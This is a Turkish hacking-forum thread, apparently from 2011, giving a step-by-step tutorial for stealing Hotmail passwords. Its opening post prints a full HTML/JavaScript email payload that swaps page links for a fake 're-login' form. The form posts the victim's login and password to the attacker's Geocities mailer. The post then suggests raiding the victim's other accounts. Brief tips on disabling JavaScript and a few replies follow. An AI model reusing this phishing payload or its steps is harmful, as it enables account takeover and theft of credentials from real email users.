İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hotmail Hack

20-11-2011 03:35
#1
Th4 MasK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
İstanbul
Mesajlar:
460
Teşekkür (Etti):
27
Teşekkür (Aldı):
96
Konular:
134
Ticaret:
(0) %

Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?

Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman
Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca
size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.

Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini
kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP
Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini
aliyorsunuz.



Peki bu olaydan kurtulamayacagiz mi ??? .

Netscape kullanicilari javascript ayarlarini söyle kapatabilir.
(edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir.
(view / internet options /security / custom settings / scripting / disable active scripting).



Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???

Asagidaki Listedekiler elimizde olmali.

1 Internete bagli bir bilgisayar... eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programi)
1 Notepad (veya herhangi bir text editor)


1.ADIM:

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.



2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda
e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).



3.ADIM:

NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit
ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi.
(bu kullanici adini kendinize göre degistirin.)

[PHP]<html><head></head><body> <p>"Go where you want today" - Blue Adept</p> ********** function getmess(){ return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" + "<tr valign=middle>" + "<th colspan=2>" + "<font face=\"Arial, Helvetica\" size=\"5\">" + "We're Sorry, We Cannot<br>Process Your Request" + "</font></th></tr>" + "<tr valign=middle><td align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" + "<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" + "<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" + "</td></tr>" + "<tr valign=\"middle\"><td align=\"center\">" + "<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" + "<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" + "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" + "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" + "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\">&nbsp;<input type=\"submit\" value=\"Enter\"></td><tr>" + "</table></form></td></tr>" + "<tr valign=middle><th colspan=2 align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">" + "Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." + "</font></th></tr></table>" + "<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">"; } nomenulinks=top.submenu.********.links.length; for(i=0;i<nomenulinks-1;i++){ top.submenu.********.links[i].target="work"; top.submenu.********.links[i].href="javascript:getmess()"; } noworklinks=top.work.********.links.length; for(i=0;i<noworklinks-1;i++){ top.work.********.links[i].target="work"; top.work.********.links[i].href="javascript:getmess()"; } </script> </body> </html>[/PHP]4.ADIM

kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban,

(victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.



5.ADIM


Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman

Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de
kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...



Alıntı.
Konu Th4 MasK tarafından (20-11-2011 03:38 Saat 03:38 ) değiştirilmiştir.
Bar1o Teşekkür etti.

20-11-2011 11:44
#2
Margu - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2010
Mesajlar:
2.944
Teşekkür (Etti):
263
Teşekkür (Aldı):
643
Konular:
1669
Ticaret:
(0) %
GeoCities.com'a giriyorum otomatik olarak buraya yönlendiriyor ve ;

Sorry, GeoCities has closed.


Şeklinde bir hata veriyor site kapanmış herhalde ?
20-11-2011 14:48
#3
Th4 MasK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
İstanbul
Mesajlar:
460
Teşekkür (Etti):
27
Teşekkür (Aldı):
96
Konular:
134
Ticaret:
(0) %
Alıntı:
Margu´isimli üyeden Alıntı Mesajı göster
GeoCities.com'a giriyorum otomatik olarak buraya yönlendiriyor ve ;

Sorry, GeoCities has closed.


Şeklinde bir hata veriyor site kapanmış herhalde ?

Sanırım Sorun Var Düzelir Büyük İhtimal.
26-11-2011 16:02
#4
cigazen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2006
Mesajlar:
40
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
saoL arkadaş

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı